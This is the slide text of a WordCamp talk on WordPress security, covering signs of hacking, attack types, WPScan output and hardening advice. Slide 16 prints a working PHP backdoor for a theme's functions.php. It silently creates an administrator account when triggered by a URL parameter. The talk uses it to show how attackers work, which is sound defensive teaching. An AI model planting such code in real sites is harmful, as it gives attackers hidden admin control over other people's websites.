RFStudio's Co-Founder Max (Hassan) Raza delivered a detailed session with demonstrations around WordPress security and shared experiences with WordCamp community about security and how to make WordPress more secure together.

1. WordPress Security
A Hackers Guide

2. Hassan Raza
Growth Hacker
Co-Founder, rfstud.io

3. @thecraft
y
Overview
• WordPress Security Flaws
• Nulled Themes & Insecure Plugins
• Server Side Configs
• Hardening WordPress
• Top Security Tools & Practices

4. WordPress Safe Enough?
▼ 43 % Attacks on SMEs
▼Every 39 Seconds – One Cyber Attack
▼ WordPress Most Hacked?

5. A Cyber attack Happening every Minute!

7. • Permalinks structure changed (Auto)
• .htaccess results in 301 Redirection to Random Sites
• Spurious Redirections from your Home Page
• Weird Content and Banner Ads on Your Site
• Google Site View Shows Irrelevant Links
• Unusual Admin Users
• Weird DB Tables
Hacked?
Probably Yes If:

8. • SQL Injection
• Cross-site Scripting - XSS
• Forgery
• Phishing
• Remote File Inclusion
• File Upload
• Path Traversal
• Malware Redirect
• Brute Force Attack
• WordPress DDOS attack
Advanced Hacks

9. Common Reasons
• Credential Stuffing
• Improper Deployment
• Security Mis-Configuration or Missing Entirely
• Lack of Security Knowledge or Resources
• Broken Authentication & Management

10. 44%
Keep their CMS Updated.

11. Vulnerable Third Party Components are
Primary Attack Vector.

12. Vulnerable Third Party Components are
Primary Attack Vector.
You are easily Hack-able if:
1- You are using Nulled Themes
2- You have Vulnerable Plugins in Use
3- You have Outdated Themes/Plugins

13. WP-Scan Kali Linux

14. WP-Scan Kali Linux
• Detects WordPress
• Identifies Mis-Configs
• Compares Outdated Versions
• Identifies Vulnerabilities

15. WP-Scan Kali Linux
| Interesting Entries:
| - Server: Apache/2.4.39 ()
| - X-Powered-By: PHP/7.2.17
| - Upgrade: h2,h2c
| Found By: Headers (Passive Detection)
| Confidence: 100%
[!] 8 vulnerabilities identified:
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 5.2.3

16. <?php
add_action('wp_head', 'WordPress_backdoor');
function WordPress_backdoor() {
If ($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
If (!username_exists('backdooradmin')) {
$user_id = wp_create_user('backdooradmin',
'Pa55W0rd');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
PHP Backdoor
Inject a small piece of
code to theme’s
function.php
You have full wp access!

17. Hackers Guide
Keep WordPress Updated
Use Strong Passwords & Permissions
Install Backup Solution
Try Hacking your Own Site!

18. Hackers Guide
Change Default Admin Username
Disable File Editing
Change WordPress Prefix
Password Protect Admin & Login Page
Disable XML-RPC

19. Top Plugins to Make Security Easy
1- WordFence
2- Securi Security
3- iThemes Security

20. WordPress Security Experts
Bug Bounty Program Since 2016
https://hackerone.com/wordpress
Follow Best Practices Listed by Experts here
https://wordpress.org/about/security/

21. Contact Me:
hassan@rfstud.io
Twitter: @hasanphd
WordPress Security
Lets Make Possible Together